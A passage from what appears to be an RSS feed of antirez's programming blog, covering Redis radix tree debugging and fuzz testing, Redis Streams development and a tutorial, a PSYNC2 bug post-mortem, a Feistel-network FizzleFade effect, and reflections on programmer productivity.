I was lucky enough that my friend Fedor Indutny, of Node.js fame, was willing to help. He quickly realized why the C and the assembly could not match: what I was analyzing was not the right C code… but a newer version of the same function. Fedor had GCC 5.4.0 at hand, the same compiler used by the user reporting the bug, so he tried to compile an older version of the code with it, realizing that now the two versions of the emitted code matched perfectly. He pinged me about it, asking if I was sure that this was a recent Redis version. I was absolutely sure, it was Redis 4.0.6. But then I started to have a few doubts, and I took a diff of rax.c between the Redis unstable branch and Redis 4.0. What happened was that I had fixed this bug about ten months earlier, in the course of the Streams implementation. During the cherry picking activity, where bugfixes from unstable are backported to Redis 4.0, the fix was inside a commit about streams, so I was constantly skipping it. Everything was finally clear: I had debugged for days a bug that was not there in the version I was testing.

If it was just a lame mistake of mine, why did I bother to write this blog post? Because, I believe, there are lessons to be learned from all this.

The first lesson is that crash reports like the ones Redis is able to emit are a key asset in system software. They allow reconstructing the state of bugs that you are not able to replicate, and that happen very rarely in the wild. While the bug was already fixed, I was able to understand exactly what was happening just by looking at the bug reports: register dumps, offending address, and call stack.

The second lesson is that you should learn AMD64 assembly today, at least to comfortably read the code emitted by the compiler and follow what is happening, if you want to get involved in system programming. This is often the only way to understand what is happening during a heisenbug. Debuggers won’t help much: GDB was claiming that the crash was happening at the instruction parent->size--, which is of course impossible. But GDB is not to blame; modern compilers, with optimizations turned on, generate code that can hardly be matched back to the source code.

Another lesson is how powerful well done fuzz testing is. The fuzz tester was immediately able to find the bug in the broken version. Similarly, the fact that no radix tree crash was ever observed other than this bug, fixed a long time ago, speaks for itself. The radix tree implementation is very complex, yet thanks to fuzz testing there are apparently no bugs in an implementation that is both new and complex. I want to stress the importance of doing fuzzing not just to find crashes: that’s good for security people that want to discover zero days. Fuzzing for system software should perform random operations according to a sane operational model, and compare the outcome with a reference implementation, as in the sketch below.
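
To make the idea more concrete, here is a minimal sketch of this model-based style of fuzzing against the rax API (assuming rax.c / rax.h from the Redis source tree are compiled in; the real fuzz tester is much richer, also exercising the iterators):

#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include "rax.h"

#define KEYSPACE 1024 /* tiny key space: collisions and node splits happen often */

int main(void) {
    rax *t = raxNew();
    unsigned char ref[KEYSPACE] = {0}; /* reference model: is key i present? */
    char key[32];

    for (long i = 0; i < 100000000; i++) {
        int k = rand() % KEYSPACE;
        int len = snprintf(key, sizeof(key), "key-%d", k);
        switch (rand() % 3) {
        case 0: /* random insertion, mirrored in the model */
            raxInsert(t, (unsigned char*)key, len, (void*)1, NULL);
            ref[k] = 1;
            break;
        case 1: /* random deletion, mirrored in the model */
            raxRemove(t, (unsigned char*)key, len, NULL);
            ref[k] = 0;
            break;
        case 2: /* lookup: the tree and the model must always agree */
            assert((raxFind(t, (unsigned char*)key, len) != raxNotFound)
                   == ref[k]);
            break;
        }
    }
    raxFree(t);
    return 0;
}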

And finally, there is a clear lesson for me: next time I need to be more careful when working on a feature branch and making fixes that are not specific to the feature branch. I was working under the assumption that I would merge everything back into 4.0 ASAP. Then it was not the case, and putting the radix tree update into the same commit implementing Stream things was a fatal error.

Well, bonus point: having smart friends helps :-) I was a bit lost at that point, and the kind help of Fedor provided the last piece of the puzzle and let me quickly move forward. Don’t be afraid to ask for help. If you get involved in system software, remember that it is very different from other fields of programming. It’s not just that you do some work and bring things forward: you must be prepared to spend days trying to understand why a bug happened, a bug that often you are not able to reproduce, because users deserve more than software crashing like that.
An update on Redis Streams development http://antirez.com/news/116 http://antirez.com/news/116 Thu, 25 Jan 2018 18:00:34 +0000
To start, at this moment Streams are my main priority: I want to finish this work that I believe is very useful for the Redis community, and immediately start with the Redis Cluster improvement plans. Actually the work on Cluster has already started, with my colleague Fabio Nicotra porting redis-trib, the Cluster management tool, inside the good old redis-cli. This step involves translating the code from Ruby to C. In the meantime, a few weeks ago I finished writing the Streams core, and I deleted the “streams” feature branch, merging everything into the “unstable” branch.

Later I reviewed again, several times actually, the specification for consumer groups. A few weeks ago I was finally happy with the result, so I started the implementation of this specification: https://gist.github.com/antirez/68e67f3251d10f026861be2d0fe0d2f4. Be aware that command names changed quite a bit… with the API now being more like this: https://gist.github.com/antirez/4e7049ce4fce4aa61bf0cfbc3672e64d.

I’m halfway through: after the first 500 lines of code, today I was able to see clients using the XREADGROUP command fetching only their local history when asking for old messages. This was a milestone in the implementation. Also XACK is now available. Basically all the data structures supporting the streams consumer groups are working, but I need to finish all the command implementations, support the blocking operations in XREADGROUP and so forth, and handle replication, RDB and AOF persistence. In more or less one month I should have everything ready.

Because of consumer groups, the RDB format of the Streams is going to change a lot compared to what “unstable” is using right now. And since we have to break compatibility anyway, we’ll also add the ability for RDB files to persist information about the keys’ last access time, so that a Redis restart (or slave loading) involving RDB will get all the info needed in order to continue evicting keys in the correct way. Right now all that information would be lost instead. Because of these radical RDB changes the plan changed a bit: Streams are going to appear in Redis 5.0 and not 4.0, but 5.0 will be released as GA in about two months. This is possible because 5.0 will be just 4.0 plus streams, with no other major features inside, except for the RDB changes…

So TLDR: I’m working on Streams almost full time, except for some time spent checking PRs / issues for critical stuff, and in two months, if you upgrade to Redis 5.0, you’ll have production ready streams with consumer groups fully implemented. There is also quite a documentation effort to perform: I’ll write both the command manuals and an extensive introduction to streams once we go RC1, which is in about one month, so that people will have documentation to support their tests during the release candidate stage.

I hope this clarifies what’s happening with Streams. See you soon with Redis 5.0 :-)
Redis PSYNC2 bug post mortem http://antirez.com/news/115 http://antirez.com/news/115 Sat, 02 Dec 2017 14:44:32 +0000
All this is good news from the point of view of Redis operations; however, while PSYNC2 has been pretty solid since its introduction in Redis 4.0.0 stable, the feature involving a restarting slave was definitely lacking reliability. There were two problems with this feature. The first is that it was a last-minute addition to PSYNC2, and was not part of the original design document. It was more like an obvious extension of the work we did in PSYNC2, but was not scrutinized at the same level as the rest of the specification for potential bugs and issues. The second problem is that the feature is more complex than it initially looks, because it’s tricky to really restore *all* the state the replication has on the slave side after a restart. Moreover, failing to restore certain bits of the state does not result in evident bugs most of the time, so they are hard to spot via integration tests. Only when specific conditions happen will the lack of some state result in problems. For instance, failing to correctly reconstruct the currently selected DB in the slave replication state will create problems only when there are writes happening in different Redis DBs, and such a bug would misbehave only under special conditions.

Thanks to the help of many Redis contributors, but especially thanks to the @soloestoy Github user, a Redis developer at Alibaba, we recently worked on fixing a number of potential PSYNC2 issues. All the work done was finally going to land in Redis 4.0.3 in a few days, after much testing of all the patches written so far. However once I received issue #4483, I understood I had to rush the release of Redis 4.0.3, because this was far more serious than the other Redis 4 PSYNC2 issues that we had discovered up to that point.

The bug described in issue #4483 was fairly simple, yet very problematic. After a slave restart, and the resulting reload of the replication state from the RDB, the master replication backlog could contain Lua script executions in the form of EVALSHA commands. However the slave Lua scripting engine is flushed of all the scripts after the restart, so it is not able to process such commands. This results in the slave not processing writes originated by Lua scripts, unless such scripts were using “commands replication”, which is not the default: the default is to replicate the script itself.

I went a bit into panic mode… and wrote a few alternative patches that I submitted to the issue. In the end the one that did not require RDB incompatibilities with older versions was picked, so I went ahead and released Redis 4.0.3 ASAP. However I made a mistake… For a few weeks now I have been working from an office instead of working from home. Normally I do not work at night, but for 4.0.3, when I returned home, I opened my home laptop, merged the patch into the 4.0 branch, and did some testing activity. The next day, when I returned to the office, I continued working from another computer, but I did not realize that I was missing one commit that I had merged at home without pushing it to the repository.

So I basically released a 4.0.3 that had all the PSYNC2 fixes minus the most important one for the replication bug. I released ASAP a new patch level version, Redis 4.0.4, including the replication fix. This was already not great: upgrading Redis is a scheduled activity, and nobody wants to upgrade two times because I make errors in preparing the release… But the worst was yet to happen. The fix that I added in 4.0.4, the one about script replication in restarting slaves performing PSYNC2, had an error that passed totally unnoticed through all the replication integration tests: the fix involved storing the Lua scripts from the slave memory directly into the RDB, in order to reload them later. However it was not considered that the function loading the scripts would assert if the script was already in memory, so when a slave received a full synchronization from a master, it started to load the RDB file, crashing immediately because of some duplicated script that was already in memory. A user reported it ASAP via Twitter, and I fixed the problem in less than 45 minutes, from the moment of the report to the 4.0.5 availability, but this does not mitigate all the potential problems that this sequence of failures at delivering a fix caused.

The above problems were caused by a number of reasons:

1. Redis 4.0 was delivered as stable too early, considering the complexity and the amount of code changed by PSYNC2. Next time, even at the cost of delaying releases, I’ll wait more, and keep new major versions of Redis longer in the last release candidate stage, so that we can find such bugs before shipping a GA version.

2. I rushed too much trying to deliver a fix for issue #4483. Even if the bug was critical, it was better to spend some time checking what was happening, and the potential problems caused by the fix itself. Moreover I was in such a hurry that I did not check the set of commits composing 4.0.3 with enough care, causing the lack of one of the fixes, and the need for a new release.

3. While Redis 4.0 has very strict PSYNC2 unit and integration tests, including tests that simulate continuous failovers while checking data consistency at every step, because of this bug I discovered that the tests never try to mix PSYNC2 with the replication of Lua scripts. This must be improved. Also the PSYNC2 replication after a slave RDB restart must be tested better as well.

I’ll start with the improvements at “3”, and in the future I’ll consider the lessons at “1” and “2” before every new release. My sincere apologies to everybody that had to deal with my errors in this instance, and a big thank you to @soloestoy for an incredible amount of help and support.
Streams: a new general purpose data structure in Redis. http://antirez.com/news/114 http://antirez.com/news/114 Mon, 02 Oct 2017 15:12:35 +0000
However, at the same time, there was a problem in Redis that did not let me feel relaxed about the data structures it exports by default. There is some kind of gap between Redis lists, sorted sets, and Pub/Sub capabilities. You can kind of use all these tools in order to model a sequence of messages or events, but with different tradeoffs. Sorted sets are memory hungry, can’t model naturally the same message being delivered again and again, and clients can’t block for new messages. Because a sorted set is not a sequential data structure, but a set where elements can be moved around by changing their scores, it is no wonder it was not a good match for things like time series. Lists have different problems, creating similar applicability issues in certain use cases: you cannot explore what is in the middle of a list, because the access time in that case is linear. Moreover no fan-out is possible: blocking operations on lists serve a single element to a single client. Nor is there a fixed element identifier in lists, in order to say: give me things starting from that element. For one-to-many workloads there is Pub/Sub, which is great in many cases, but for certain things you do not want fire-and-forget: retaining a history is important, not just to refetch messages after a disconnection, but also because certain lists of messages, like time series, are very important to explore with range queries: what were my temperature readings in this 10 second range?

The way I tried to address the above problems was planning a generalization of sorted sets and lists into a unique, more flexible data structure; however my design attempts almost always ended up making the resulting data structure way more artificial than the current ones. One good thing about Redis is that the exported data structures resemble the natural computer science data structures more than “this API that Salvatore invented”. So in the end I stopped my attempts and said: ok, that’s what we can provide so far, maybe I’ll add some history to Pub/Sub, or some more flexibility to list access patterns in the future. However every time a user approached me during a conference saying “how would you model time series in Redis?” or similar questions, my face turned green.

Genesis
=======

After the introduction of modules in Redis 4.0, users started to see how they could fix this problem themselves. One of them, Timothy Downs, wrote me the following over IRC:

the module I'm planning on doing is to add a transaction log style data type - meaning that a very large number of subscribers can do something like pub sub without a lot of redis memory growth
subscribers keeping their position in a message queue rather than having redis maintain where each consumer is up to and duplicating messages per subscriber

This captured my imagination. I thought about it for a few days, and realized that this could be the moment when we could solve all the above problems at once. What I needed was to re-imagine the concept of a “log”. A log is a basic programming element everybody is used to, because it’s just as simple as opening a file in append mode and writing data to it in some format. However Redis data structures must be abstract. They are in memory, and we use RAM not just because we are lazy, but because, using a few pointers, we can conceptualize data structures and make them abstract, to allow them to break free of the obvious limits. For instance, normally a log has several problems: the offset is not logical but an actual byte offset. What if we want logical offsets related to the time an entry was inserted? Then we have range queries for free. Similarly, a log is often hard to garbage collect: how do you remove old elements in an append only data structure? Well, in our idealized log, we just say we want at most this number of entries, and the old ones will go away, and so forth.

While I was trying to write a specification starting from the seed idea of Timothy, I was working on a radix tree implementation for Redis Cluster, to optimize certain parts of its internals. This provided the ground to implement a very space efficient log, still accessible in logarithmic time to get ranges. At the same time I started reading about Kafka streams to get other interesting ideas that could fit well into my design, and this resulted in borrowing the concept of Kafka consumer groups, and idealizing it again for Redis and the in-memory use case. However the specification remained just a specification for months, to the point that after some time I rewrote it almost from scratch in order to upgrade it with the many hints I accumulated while talking with people about this upcoming addition to Redis. I wanted Redis streams to be a very good use case for time series especially, not just for other kinds of events and messaging applications.

Let’s write some code
=====================

Back from Redis Conf, during the summer, I was implementing a library called “listpack”. This library is just the successor of ziplist.c, that is, a data structure that can represent a list of string elements inside a single allocation. It’s just a very specialized serialization format, with the peculiarity of being parsable also in reverse order, from right to left: something needed in order to substitute ziplists in all their use cases.

By mixing radix trees and listpacks, it is possible to easily build a log that is at the same time very space efficient and indexed, meaning that it allows random access by ID and time. Once this was ready, I started to write the code in order to implement the stream data structure. I’m still finishing the implementation; however at this point, inside the Redis “streams” branch on Github, there is enough to start playing and having fun. I don’t claim that the API is 100% final, but there are two interesting facts. One is that at this point only the consumer groups are missing, plus a number of less important commands to manipulate the stream, but all the big things are implemented already. The second is the decision to backport all the stream work into the 4.0 branch in about two months, once everything looks stable. It means that Redis users will not have to wait for Redis 4.2 in order to use streams: they will be available ASAP for production usage. This is possible because, being a new data structure, almost all the code changes are self-contained in the new code. The exception is the blocking list operations: the code was refactored so that streams and lists share the same code for blocking operations, with a great simplification of the Redis internals.

Tutorial: welcome to Redis Streams
==================================

In some way, you can think of streams as a supercharged version of Redis lists. Stream elements are not just single strings, they are objects composed of fields and values. Range queries are possible and fast. Each entry in a stream has an ID, which is a logical offset. Different clients can blocking-wait for elements with IDs greater than a specified one. A fundamental command of Redis streams is XADD. Yes, all the Redis stream commands are prefixed by an “X”.

> XADD mystream * sensor-id 1234 temperature 10.5
1506871964177.0

The XADD command appends the specified entry as a new element to the specified stream “mystream”. The entry, in the example above, has two fields: sensor-id and temperature, however each entry in the same stream can have different fields. Using the same field names will just lead to better memory usage. An interesting thing is also that the order of the fields is guaranteed to be retained. XADD returns the ID of the just inserted entry, because with the asterisk in the third argument we asked the command to auto-generate the ID. This is almost always what you want, but it is also possible to force a specific ID, for instance in order to replicate the command to slaves and AOF files.

The ID is composed of two parts: a millisecond time and a sequence number. 1506871964177 is the millisecond time, just a Unix time with millisecond resolution. The number after the dot, 0, is the sequence number, and is used to distinguish entries added in the same millisecond. Both numbers are 64 bit unsigned integers. This means that we can add all the entries we want in a stream, even in the same millisecond. The millisecond part of the ID is obtained using the maximum between the current local time of the Redis server generating the ID and the millisecond time of the last entry inside the stream. So even if, for instance, the computer clock jumps backward, the IDs will continue to be incremental. In some way you can think of stream entry IDs as whole 128 bit numbers. However the fact that they are correlated with the local time of the instance where they are added means that we get millisecond precision range queries for free.
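To make the rule concrete, this is a minimal sketch in C of the ID generation logic just described (an illustration of the rule, not the actual Redis code):

#include <stdint.h>

typedef struct {
    uint64_t ms;  /* Unix time in milliseconds. */
    uint64_t seq; /* Sequence number within the same millisecond. */
} streamID;

/* Generate the ID of a new entry, given the ID of the last entry in
 * the stream and the current server time in milliseconds. */
streamID next_stream_id(streamID last, uint64_t now_ms) {
    streamID id;
    if (now_ms > last.ms) {
        /* The clock moved forward: new millisecond, reset the sequence. */
        id.ms = now_ms;
        id.seq = 0;
    } else {
        /* Same millisecond, or the clock jumped backward: keep the old
         * millisecond part and just increment the sequence, so that IDs
         * remain incremental anyway. */
        id.ms = last.ms;
        id.seq = last.seq + 1;
    }
    return id;
}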

As you can guess, adding two entries very fast will result in only the sequence number being incremented. We can simulate the “fast insertion” simply with a MULTI/EXEC block:

> MULTI
OK
> XADD mystream * foo 10
QUEUED
> XADD mystream * bar 20
QUEUED
> EXEC
1) 1506872463535.0
2) 1506872463535.1

The above example also shows how we can use different fields for different entries without having to specify any schema initially. What happens however is that the first message of every block (a block usually contains something in the range of 50-150 messages) is used as a reference, and successive entries having the same fields are compressed with a single flag saying “same fields as the first entry in this block”. So indeed using the same fields for successive messages saves a lot of memory, even when the set of fields slowly changes over time.

In order to retrieve data from the stream there are two ways: range queries, which are implemented by the XRANGE command, and streaming, implemented by the XREAD command. XRANGE just fetches a range of items from start to stop, both inclusive. So for instance I can fetch a single item, if I know its ID, with:

> XRANGE mystream 1506871964177.0 1506871964177.0
1) 1) 1506871964177.0
   2) 1) "sensor-id"
      2) "1234"
      3) "temperature"
      4) "10.5"

However you can use the special start symbol “-” and the special stop symbol “+” to signify the minimum and maximum ID possible. It’s also possible to use the COUNT option in order to limit the number of entries returned. A more complex XRANGE example is the following:

> XRANGE mystream - + COUNT 2
1) 1) 1506871964177.0
   2) 1) "sensor-id"
      2) "1234"
      3) "temperature"
      4) "10.5"
2) 1) 1506872463535.0
   2) 1) "foo"
      2) "10"

Here we are reasoning in terms of ranges of IDs, however you can also use XRANGE to get the elements in a given time range, because you can omit the “sequence” part of the IDs. So what you can do is just specify times in milliseconds. The following means: “Give me up to 10 entries starting from the Unix time 1506872463”:

> XRANGE mystream 1506872463000 + COUNT 10
1) 1) 1506872463535.0
   2) 1) "foo"
      2) "10"
2) 1) 1506872463535.1
   2) 1) "bar"
      2) "20"

A final important thing to note about XRANGE is that, given that we receive the IDs in the reply, and the immediately successive ID is trivially obtained by incrementing the sequence part of the ID, it is possible to use XRANGE to incrementally iterate the whole stream, receiving at every call the specified number of elements. After the *SCAN family of commands in Redis, which allowed iteration of Redis data structures *despite* the fact they were not designed for being iterated, I avoided making the same mistake again.
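For instance, continuing the examples above: if the last entry returned was 1506872463535.1, the next call can simply start at the ID with the sequence incremented by one, since the start of the range is inclusive (a hypothetical continuation of the previous transcripts):

> XRANGE mystream 1506872463535.2 + COUNT 2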

Streaming with XREAD: blocking for new data
===========================================

XRANGE is perfect when we want to access our stream to get ranges by ID or time, or single elements by ID. However in the case of streams that different clients must consume as data arrives, this is not good enough and would require some form of polling (which could be a good idea for *certain* applications that just connect from time to time to get data).

The XREAD command is designed to read, at the same time, from multiple streams, by just specifying the ID of the last entry we got from each stream. Moreover we can request to block if no data is available, and to be unblocked when data arrives. This is similar to what happens with blocking list operations, but here data is not consumed from the stream, and multiple clients can access the same data at the same time.

This is a canonical example of an XREAD call:

> XREAD BLOCK 5000 STREAMS mystream otherstream $ $

And it means: get data from “mystream” and “otherstream”. If no data is available, block the client, with a timeout of 5000 milliseconds. After the STREAMS option we specify the keys we want to listen to, and the last ID we have for each. However the special ID “$” means: assume I already have all the elements currently in the stream, so give me entries starting from the next one arriving.

If, from another client, I send the command:

> XADD otherstream * message "Hi There"

This is what happens on the XREAD side:

1) 1) "otherstream"
2) 1) 1) 1506935385635.0
2) 1) "message"
2) "Hi There"

We get the key that received data, together with the data received. In the next call, we’ll likely use the ID of the last message received:

> XREAD BLOCK 5000 STREAMS mystream otherstream $ 1506935385635.0

And so forth. However note that with this usage pattern, it is possible that the client will connect again after a very long delay (because it took time to process messages, or for any other reason). In such a case a lot of messages could pile up in the meantime, so it is wise to always use the COUNT option with XREAD, in order to make sure the client will not be flooded with messages and the server will not have to waste too much time serving tons of messages to a single client.
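A minimal sketch of such a call (I’m assuming here that COUNT composes with BLOCK in exactly this way in the final API):

> XREAD COUNT 100 BLOCK 5000 STREAMS mystream $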

Capped streams
==============

So far so good… however streams at some point have to remove old messages. Fortunately this is possible with the MAXLEN option of the XADD command:

> XADD mystream MAXLEN 1000000 * field1 value1 field2 value2

This basically means: if the stream, after adding the new element, is found to have more than 1 million messages, remove old messages so that the length returns back to 1 million elements. It’s just like using RPUSH + LTRIM with lists, but this time we have a built-in mechanism to do so. However note that the above also means that every time we add a new message, we incur the work needed to remove a message from the other side of the stream. This takes some CPU, so it is possible to use the “~” symbol before the count in MAXLEN, in order to specify that we are not really demanding *exactly* 1 million messages, and if there are a few more it’s not a big problem:

> XADD mystream MAXLEN ~ 1000000 * foo bar

This way XADD will remove messages only when it can remove a whole node. This makes capped streams nearly free compared to vanilla XADD.

Consumer groups (work in progress)
==================================

This is the first of the features that is not yet implemented in Redis, but is a work in progress. It is also the idea most clearly inspired by Kafka, even if it is implemented here in a pretty different way. The gist is that with XREAD, clients can also add a “GROUP <group-name> <consumer-name>” option. Automatically all the clients in the same group will get *different* messages. Of course there can be multiple groups reading from the same stream: in that case all the groups will receive duplicates of the same messages arriving in the stream, but within each group, messages will not be repeated.

An extension to groups is that it will be possible to specify a “RETRY <milliseconds>” option when groups are specified: in this case, if messages are not acknowledged for processing with XACK, they will be delivered again after the specified amount of milliseconds. This provides some best effort reliability for the delivery of the messages, in case the client has no private means to mark messages as processed. This part is a work in progress as well.

Memory usage and saving/loading times
=====================================

Because of the design used to model Redis streams, the memory usage is remarkably low. It depends on the number of fields and values and their lengths, but for simple messages we are at a few million messages for every 100 MB of used memory. Moreover, the format is conceived to need very minimal serialization: the listpack blocks that are stored as radix tree nodes have the same representation on disk and in memory, so they are trivially stored and read. For instance Redis can read 5 million entries from the RDB file in 0.3 seconds. This makes replication and persistence of streams very efficient.

It is planned to also allow deletion of items in the middle. This is only partially implemented, but the strategy is to mark entries as deleted in the entry flag, and when a given ratio between entries and deleted entries is reached, the block is rewritten to collect the garbage, and if needed it is glued to an adjacent block in order to avoid fragmentation.

Conclusions and ETA
===================

Redis streams will be part of Redis stable in the 4.0 series before the end of the year. I think that this general purpose data structure is going to patch a big hole, allowing Redis to cover a lot of use cases that were hard to cover before: you had to be creative in abusing the current data structures to fix certain problems. One very important use case is time series, but my feeling is that streaming of messages via XREAD is also going to be very interesting, both as a replacement for Pub/Sub applications that need more reliability than fire-and-forget, and for completely new use cases. For now, if you want to start evaluating the new capabilities in the context of your problems, just fetch the “streams” branch on GitHub and start playing. After all, bug reports are welcome :-)

If you like videos, a real-time session showing streams is here: https://www.youtube.com/watch?v=ELDzy9lCFHQ
Doing the FizzleFade effect using a Feistel network http://antirez.com/news/113 http://antirez.com/news/113 Tue, 29 Aug 2017 14:35:14 +0000
You may wonder why the original code used an LFSR, or why I'm proposing a different approach instead of the vanilla setPixel(rand(),rand()): doing this with a pseudo random number generator, as noted in the blog post, is slow, but it is also visually very unpleasant, since the more red pixels you already have on the screen, the less likely it is that you hit a new not-yet-red pixel, so the final pixels take forever to turn red (I *bet* that many readers of this blog post tried it in the old times of the Spectrum, C64, or later with QBASIC or GWBasic). In the final part of the blog post the author writes:

"Because the effect works by plotting pixels individually, it was hard to replicate when developers tried to port the game to hardware accelerated GPU. None of the ports managed to replicate the fizzlefade except Wolf4SDL, which found a LFSR taps configuration to reach resolution higher than 320x200.”

While not rocket science, finding a suitable LFSR for other resolutions was possibly hard. However, regardless of the real complexity of finding an appropriate LFSR for other resolutions, the authors of the ports could have used another technique, called a Feistel network, to get exactly the same result in a trivial way.

What is a Feistel Network?
===

It’s a building block typically used in cryptography: it creates a transformation between a sequence of bits and another sequence of bits, so that the transformation is always invertible, even if you use any kind of non linear transformation inside the Feistel network. In practical terms the Feistel network can, for example, translate a 32 bit number A into another 32 bit number B, according to some function F(), so that you can always go from B back to A later. Because the function is invertible, it implies that for every distinct input value the Feistel network generates *a different* output value.

This is a simple Feistel network in pseudo code:

Split the input into L and R halves (example: L = INPUT & 0xFF, R = INPUT >> 8)
REPEAT for N rounds:
    next_L = R
    R = L XOR F(R)
    L = next_L
END
RETURN the value composing L and R again into a single sequence of bits: R<<8 | L

So we basically split a (for example) 16 bit integer into two 8 bit integers L and R, perform some transformation for N rounds, and recompose them back into a 16 bit integer, which is our output.

But how is this useful for our problem of implementing FizzleFade? Well, you can imagine your 2D screen as a linear array of pixels. If the resolution is 320x200 like in the original game, you have pixels from 0 to 63999. So, counting from 0 to 63999, for every integer we can generate a random looking pixel position just by setting the pixel at the position returned by the Feistel network. The problem is that the Feistel network works in bits, so we can’t cover exactly the range from 0 to 63999: we have to pick a power of two which is large enough. The nearest suitable size is 16 bits in this case: with 16 bits we have 65536 integer-to-integer transformations, so a few cycles (the outputs from 64000 to 65535) will not be used to set an actual pixel, but that is not a big waste.

So, this is how our Feistel network looks, in Javascript:

/* Transforms the 16 bit input into another seemingly pseudo random number
 * in the same range. Every 16 bit input will generate a different
 * 16 bit output. This is called a Feistel network. */
function feistelNet(input) {
    var l = input & 0xff;
    var r = input >> 8;
    for (var i = 0; i < 8; i++) {
        var nl = r;
        var F = (((r * 11) + (r >> 5) + 7 * 127) ^ r) & 0xff;
        r = l ^ F;
        l = nl;
    }
    return ((r<<8)|l)&0xffff;
}

The non linear transformation “F” I’m using is just a few multiplications and shifts, picked mostly at random.
I’m using 8 rounds even if fewer would probably suffice with a better F function, but I want the effect to look random (coincidentally, drawing random pixels is a decent way to visually spot trivial bad distribution properties).
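Putting it together, the drawing loop just feeds a counter into the network and skips the outputs that fall outside the screen. A minimal sketch in C (assuming a feistelNet() port of the function above, and a hypothetical set_pixel() provided by the graphics layer):

#include <stdint.h>

uint16_t feistelNet(uint16_t input);    /* The network above, ported to C. */
void set_pixel(uint32_t x, uint32_t y); /* Hypothetical: turns a pixel red. */

void fizzlefade(void) {
    for (uint32_t i = 0; i < 65536; i++) {
        uint32_t pos = feistelNet((uint16_t)i);
        uint32_t x = pos % 320;
        uint32_t y = pos / 320;
        /* Skip the 1536 outputs that fall outside the 320x200 screen. */
        if (y < 200) set_pixel(x, y);
    }
}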

To implement this using a Javascript canvas we need a few more functions, to get a 2D context and to set a pixel.

The final code is in this Gist: https://gist.github.com/antirez/6d58860b221a6ae5622ced8ccdddbe47

You can see the result here: http://antirez.com/misc/fizzlefade.html

The original problem explored in this article was to find a way to implement the effect at different resolutions. Even if it is a trivial extension of the 320x200 case, just to make an example, imagine you want to implement the same effect at 1024x768. There are 786432 pixels, so 2^20, with its 1048576 possible integers, will fit quite well. We’ll have to modify the Feistel network to have 20 bits of input/output by using 10 bit L and R variables, otherwise everything is pretty much the same, but remember to also change the stop condition (that checks the number of frames).
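For instance, this is how the network could be widened to 10 bit halves (my sketch in C, under the same assumptions as the code above, not code from any of the actual ports):

#include <stdint.h>

/* Same Feistel network, but with 10 bit halves: a 20 bit permutation,
 * enough to cover the 786432 pixels of a 1024x768 screen. */
uint32_t feistelNet20(uint32_t input) {
    uint32_t l = input & 0x3ff;         /* Low 10 bits. */
    uint32_t r = (input >> 10) & 0x3ff; /* High 10 bits. */
    for (int i = 0; i < 8; i++) {
        uint32_t nl = r;
        uint32_t F = (((r * 11) + (r >> 5) + 7 * 127) ^ r) & 0x3ff;
        r = l ^ F;
        l = nl;
    }
    return ((r << 10) | l) & 0xfffff;
}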

Actually the one-to-one pseudo random mapping property of Feistel networks is very useful in other contexts as well. For instance I used it in my radix tree implementation tests (https://github.com/antirez/rax in case you are curious). A good tool to have in a programmer's mental toolbox.
The mythical 10x programmer http://antirez.com/news/112 http://antirez.com/news/112 Tue, 28 Feb 2017 11:08:42 +0000
The programming community is extremely polarized about the existence or not of such a beast: some say there is no such thing as the 10x programmer, others say it not only exists, but that there are even 100x programmers if you know where to look.

If you see programming as a “linear” discipline, it is clear that the 10x programmer looks like an irrational possibility. How can a runner run 10x faster than another one? Or a construction worker build 10x the things another worker can build in the same time? However programming is a design discipline in a very special way. Even when a programmer does not participate in the actual architectural design of a program, the act of implementing it still requires a sub-design of the implementation strategy.

So if the design and implementation of a program are not linear abilities, things like experience, coding abilities, knowledge, and the recognition of useless parts are, in my opinion, not just linear advantages: they work together in a multiplicative way in the act of creating a program. Of course this phenomenon happens much more when a programmer can handle both the design and the implementation of a program. The more “goal oriented” the task is, the more a potential 10x programmer can exploit her/his abilities in order to reach the goal with a lot less effort. When the task at hand is more rigid, with specific guidelines about what tools to use and how to implement things, the ability of a 10x programmer to perform a lot of work in less time is weakened: she/he can still exploit “local” design possibilities to do a much better job, but cannot change in more profound ways the path used to reach the goal, which may include, possibly, even eliminating part of the specification completely from the project, so that the goal to be reached looks almost the same but the effort to reach it is reduced by a big factor.

In twenty years of working as a programmer I have observed other programmers working with me, as coworkers, guided by me in order to reach a given goal, or providing patches to Redis and other projects. At the same time many people have told me that they believe I’m a very fast programmer. Considering I’m far from being a workaholic, I’ll also use myself as a reference of coding things fast.

The following is a list of qualities that I believe make the most difference in programmers productivity.

* Bare programming abilities: getting sub-tasks done

One of the most obvious limits, or strengths, of a programmer is the ability to deal with the sub-task of actually implementing part of a program: a function, an algorithm, or whatever. Surprisingly, the ability to use basic imperative programming constructs very efficiently in order to implement something is, in my experience, not as widespread as one may think. In teams I have sometimes observed very incompetent programmers, not even aware of a simple sorting algorithm, get more work done than graduated programmers that were in theory extremely competent but very poor in the practice of implementing solutions.

* Experience: pattern matching

By experience I mean the set of already explored solutions for a number of recurring tasks. An experienced programmer eventually knows how to deal with a variety of sub tasks. This avoids a lot of design work, but especially, it is an extremely powerful weapon against design errors, which are in turn among the biggest enemies of simplicity.

* Focus: actual time VS hypothetical time

The number of hours spent writing code is irrelevant without looking at the quality of the time. Lack of focus can be generated by internal and external factors. Internal factors are procrastination, lack of interest in the project at hand (you can’t be good at doing things you do not love), lack of exercise / well-being, poor or too little sleep. External factors are frequent meetings, work environments without actual offices, coworkers interrupting often, and so forth. It seems natural that trying to improve focus and to reduce interruptions is going to have a non marginal effect on programming productivity. Sometimes, in order to gain focus, extreme measures are needed. For instance I only read emails from time to time and do not reply to most of them.

* Design sacrifice: killing 5% to get 90%

Often complexity is generated when there is no willingness to recognize that a non fundamental goal of a project is accounting for a very large amount of design complexity, or is making another more important goal very hard to reach, because there is a design tension between a fundamental feature and a non fundamental one. It is very important for a designer to recognize all the parts of a design that are not easy wins, where there is no proportionality between the effort and the advantages. A project that is executed in order to maximize the output is going to focus exactly on the aspects that matter and that can be implemented in a reasonable amount of time. For example, when designing Disque, a message broker, at some point I realized that by providing just best-effort ordering of messages, all the other aspects of the project could be substantially improved: availability, query language and client interaction, simplicity, and performance.

* Simplicity

This is an obvious point that means everything and nothing. In order to understand what simplicity is, it is worth checking how complexity is often generated. I believe that the two main drivers of complexity are the unwillingness to perform design sacrifices, and the accumulation of errors in the design activity.

If you think about the design process, each time a wrong path is pursued we get further and further away from the optimal solution. An initial design error, in the wrong hands, will not generate a re-design of the same system, but will lead to the design of another complex solution in order to cope with the initial error. The project, thus, becomes more complex and less efficient at every wrong step.

